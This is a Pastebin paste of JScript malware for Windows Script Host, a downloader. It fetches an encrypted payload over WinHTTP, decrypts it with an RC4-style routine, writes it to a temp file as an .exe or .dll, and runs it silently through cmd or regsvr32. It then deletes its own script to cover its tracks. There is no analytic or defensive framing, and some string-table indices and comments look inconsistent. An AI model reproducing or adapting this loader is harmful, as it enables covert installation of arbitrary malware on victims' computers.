Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- hl = function(n, g) {
- for (var c = 0, d, b = [], h = [], a = 0; 256 > a; a++) b[a] = a;
- for (a = 0; 256 > a; a++) c = c + b[a] + g[v](a % g.length) & 255, d = b[a], b[a] = b[c], b[c] = d;
- for (var e = c = a = 0, s = String; e < n.length; e++) a = a + 1 & 255, c = c + b[a] & 255, d = b[a], b[a] = b[c], b[c] = d, h.push(s.fromCharCode(n[v](e) ^ b[b[a] + b[c] & 255]));
- return h[u(15)](u(11))
- };
- var na = "WinHTTP Request.5.1 GET Scripting.FileSystemObject WScript.Shell ADODB.Stream Arguments .exe GetTempName charCodeAt iso-8859-1 indexOf .dll ScriptFullName join run /c /s ";
- function u(i) {
- return na["Split"]("Z")[i]
- };
- function li(g) {
- var k = o(u(0) /* WinHTTP */ + "." + u(0) + u(1));
- k.setProxy(n);
- k.open(u(2), g(1), n);
- k.Option(0) = g(2);
- k.send();
- if (0310 == k.status) return hl(k["ResponseText"], g(n))
- };
- function o(a) {
- return new ActiveXObject(a)
- };
- try {
- na += "e GetTempName charCodeAt iso-8859-1 indexOf .dll ScriptFullName join run /c /s ";
- var q = o(u(3)), //Scripting.FileSystemObject
- m = WScript[u(6)], //Arguments
- j = o(u(4)), //WScript.Shell
- s = o(u(5)), //ADODB.Stream
- p = u(7), //.exe
- n = 0,
- h1 = WScript[u(14)],
- v = u(9); //charCodeAt
- s.Type = 2;
- c = q[u(8) /* GetTempName */]();
- s.Charset = u(10);
- s.Open();
- i = li(m);
- d = i[v](i[u(12) /* indexOf */ ]("PE\x00\x00") + 23);
- s["WriteText"](i);
- if (037 < d) {
- var z = 1;
- c += u(13)
- } else c += p;
- s["SavetoFile"](c, 2);
- s.Close();
- z && (c = "regsvr32" + p + u(18) + c);
- j[u(16)/*join*/]("cmd" + p /* .exe */ + u(17) /* run */ + c, 0)
- } catch (hy) {}
- q["DeleteFile"](h1);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement